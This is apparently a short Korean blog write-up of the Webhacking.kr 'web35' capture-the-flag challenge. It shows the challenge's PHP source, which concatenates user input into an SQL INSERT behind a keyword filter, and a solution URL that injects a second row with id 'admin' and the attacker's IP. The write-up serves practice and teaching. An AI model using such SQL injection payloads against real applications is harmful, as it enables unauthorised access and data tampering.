Post

Webhacking.kr - web35

web35

1
2
3
4
5
<form method=get action=index.php>
phone : <input name=phone size=11 style=width:200px>
<input name=id type=hidden value=guest>
<input type=submit value='add'>
</form>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
$db = dbconnect();
if($_GET['phone'] && $_GET['id']){
  if(preg_match("/\*|\/|=|select|-|#|;/i",$_GET['phone'])) exit("no hack");
  if(strlen($_GET['id']) > 5) exit("no hack");
  if(preg_match("/admin/i",$_GET['id'])) exit("you are not admin");
  mysqli_query($db,"insert into chall35(id,ip,phone) values('{$_GET['id']}','{$_SERVER['REMOTE_ADDR']}',{$_GET['phone']})") or die("query error");
  echo "Done<br>";
}

$isAdmin = mysqli_fetch_array(mysqli_query($db,"select ip from chall35 where id='admin' and ip='{$_SERVER['REMOTE_ADDR']}'"));
if($isAdmin['ip'] == $_SERVER['REMOTE_ADDR']){
  solve(35);
  mysqli_query($db,"delete from chall35");
}

$phone_list = mysqli_query($db,"select * from chall35 where ip='{$_SERVER['REMOTE_ADDR']}'");
echo "<!--\n";
while($r = mysqli_fetch_array($phone_list)){
  echo htmlentities($r['id'])." - ".$r['phone']."\n";
}
echo "-->\n";
?>

Solution

1
2
3
4
5
6
7
phone 값에는 필터링(*, /, =, select, -, #, ;)이 있고, id 값 길이는 4이하여야 하며, admin이 필터링됨.
if문을 통과하면 query를 보냄.
문제 통과를 위해선 isAdmin으로 받은 id=admin의 ip와 내 ip가 동일해야 함.

?phone='123'),('admin','175.194.100.178','456'&id=test
위에 처럼 입력해주면 아래처럼 되어서 통과
insert into chall35(id,ip,phone) values('test','175.194.100.178',123'),('admin','175.194.100.178','456')
This post is licensed under CC BY 4.0 by the author.